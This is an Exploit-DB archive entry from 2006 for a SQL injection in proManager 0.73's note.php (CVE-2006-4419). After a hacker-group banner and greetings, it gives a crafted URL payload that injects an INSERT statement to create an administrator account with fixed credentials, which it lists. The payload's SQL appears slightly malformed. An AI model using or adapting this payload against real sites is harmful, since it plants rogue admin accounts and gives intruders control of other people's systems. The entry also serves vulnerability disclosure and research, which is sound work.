proManager <= 0.73 note.php Remote SQL Injection Vulnerability

2006-08-26T00:00:00
ID EDB-ID:2259
Type exploitdb
Reporter Kacper
Modified 2006-08-26T00:00:00

Description

proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability. CVE-2006-4419. Webapps exploit for php platform

                                        
                                            /*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- proManager &lt;= 0.73 (Add Admin) SQL Injection Vulnerabilities
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: proManager v.0.73
- [Script site: http://sourceforge.net/projects/promanager/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: kacper1964@yahoo.pl
-                        or
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx
-
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
#Exploit:

http://www.site.com/[proManager_path]/note.php?note_id=-1%20INSERT%20INTO%20users%20(id.username.password.name.email.can_add_user)%20values%20(1.Kacper.devilteam.Kacper.kacper1964@yahoo.pl.1)/*

Admin name: Kacper
Password: devilteam

# milw0rm.com [2006-08-26]